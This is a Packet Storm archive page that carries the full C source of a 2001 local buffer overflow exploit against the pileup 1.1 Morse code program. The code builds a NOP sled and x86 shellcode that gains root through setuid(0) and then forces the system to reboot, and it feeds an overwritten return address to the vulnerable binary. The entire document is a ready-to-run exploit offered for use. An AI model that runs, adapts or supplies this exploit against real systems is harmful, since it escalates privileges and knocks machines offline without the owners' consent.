A local buffer overflow exploit for pileup v1.1 and maybe others. Will gain root[uid=0].
03ec951fe5e15a9672e1681575352a376e8e0714adebdcf27018783bce3aee5e/* (pileup 1.1[?]) reboot_via(root[uid=0]) local buffer overflow exploit.
*
* Author: Cody Tubbs (loophole of hhp).
* Site: www.hhp-programming.net
* Email: pigspigs@yahoo.com
* Date: 5/4/2001. 12:47:17AM CST.
*
* Tested on Slackware Linux 7.1 / 2.4.5 (x86).
* Debian 2.* (x86).
*
* Info: pileup is a morse code (CW) program for radio amateurs.
* it simulates up to 9 stations calling at various CW
* speeds, tones and volumes.
* (I stumbled upon this software one night on a mission
* to learn morse code.... I sort of got side tracked.)
*
* Due to scanf() delimites execve shellcode was not used.
* Instead this will reboot the exploited system.
*/
#include <stdio.h>
#define PATH "/bin/pileup" // Change to direct path if needed.
#define OFFSET 0 // Worked for me.
#define ALLIGN 0 // Don't change.
#define NOP 0x90 // x86 No OPeration.
#define DBUF 20 // 16+4(ebp)+4(eip)=24.
#define DAT "calls.dat" // Required for exploitation.
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17" // setuid(0)/setgid(0)
"\xcd\x80\x66\x31\xc0\x66" // ''
"\x31\xdb\xb0\x2e\xcd\x80" // ''
//Sync+Reboot shellcode by bighawk[@warfare.com]
"\x31\xc0" // xor eax, eax
"\xb0\x24" // mov al, 36
"\xcd\x80" // int 80h
"\xb0\x58" // mov al, 0x58
"\xbb\xad\xde\xe1\xfe" // mov ebx, 0xfee1dead
"\xb9\x69\x19\x12\x28" // mov ecx, 0x28121969
"\xba\x67\x45\x23\x01" // mov edx, 0x1234567
"\xcd\x80"; // int 80h
long get_sp(void){__asm__("movl %esp,%eax");}
void workit(char *heh){
fprintf(stderr, "(pileup) reboot(root[uid=0]) local exploit.\n");
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n");
fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh);
}
main(int argc, char **argv){
char eipeip[DBUF],buffer[7192],heh[DBUF+1];
char go[DBUF+22];
FILE *calls;
int i,offset,allign;
long address;
workit(argv[0]);
unlink(DAT);
calls=fopen(DAT,"w");
fprintf(calls,"OWNED\n");
fclose(calls);
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
address=get_sp()-offset;
if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.DOOT:D
for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
for(i=0;i<(7192-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"UPEX=",5);
putenv(buffer);
fprintf(stderr,"Ret-addr: %#x, offset: %d, allign: %d.\n",address,offset,allign)
;
system("printf 'Attempting to reboot... adios amig*!';sleep 2");
sprintf(go,"(printf '1\n0\nC\n%s\n0\n')|%s",eipeip,PATH); //netcat style.
system(go);
printf("Exploitation failed! :(\n");
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed